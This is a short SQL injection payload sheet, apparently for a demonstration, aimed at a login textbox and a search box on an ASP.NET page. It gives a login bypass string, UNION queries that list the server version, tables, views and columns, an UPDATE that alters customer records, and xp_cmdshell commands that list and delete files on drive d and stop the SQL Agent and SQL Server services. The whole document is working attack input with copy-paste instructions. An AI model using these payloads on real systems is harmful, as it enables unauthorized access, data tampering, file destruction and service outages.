-- copy code below in user textbox of the login page to bypass the login screen

' or 3=3--

-- copy each line code below in search textbox of default.aspx

--get sql server name
m;' union SELECT 0,0, @@version --

--get ALL table name
m;' UNION select id, name,0 from sysobjects WHERE xtype = 'U'--


--get ALL View name
m;' UNION select id, name,0 from sysobjects WHERE xtype = 'V'--

--get the column name of Customers table
m;' UNION SELECT id, name, length FROM syscolumns WHERE id = '21575115'--

--update the table, modify data
m;' UPDATE Customers SET companyname='guest' where city = 'elgin'--

--get file list from drive d
m;' exec master..xp_cmdshell 'dir d:'--

--delete a file in drive d
m;' exec master..xp_cmdshell 'del d:\pleasedelete.txt'--

--stop sql agent
m;' exec master..xp_cmdshell 'net stop SQLAgent$SQL2K5'--

--stop sql server
m;' exec master..xp_cmdshell 'net stop MSSQL$SQL2K5'--